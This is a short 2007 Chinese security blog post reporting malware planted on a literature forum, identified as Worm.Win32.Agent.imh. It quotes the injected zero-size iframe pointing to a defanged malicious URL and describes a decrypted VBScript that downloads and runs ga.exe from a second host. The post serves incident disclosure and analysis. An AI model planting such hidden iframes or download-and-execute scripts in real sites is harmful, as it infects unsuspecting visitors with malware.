文学论坛挂的马换 成 Worm.Win32.Agent.imh 了

本文分析了一个文学论坛被植入的恶意软件Worm.Win32.Agent.imh,详细介绍了该恶意软件的传播方式及清除方法。通过分析论坛代码,发现了恶意软件的来源及执行流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文学论坛挂的马换 成 Worm.Win32.Agent.imh 了

endurer原创
2007-08-22第1


上回妯现挂的是 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt

刚才一不小心又进去了,卡巴没反应~

一位刚进去的网友说瑞星发现、并清除了三个 Worm.Win32.Agent.imh,都在IE缓存里,文件名是 ga[1].exe之类。

检查论坛代码,发现:

/---
<iframe src="hxxp://www.yo*y*o5**9.com/m*68.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.yo*y*o5**9.com/m*68.htm?id=907 包含脚本代码,功能是使用自定义算法解密并输出变量 S 的值。
解密后的变量 S 的值 为 VBScript 脚本,功能是下载 hxxp://x***xt*vb.cn/arp/ga.exe 并运行。

不过我这无法下载 ga.exe,难怪卡巴没反应。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值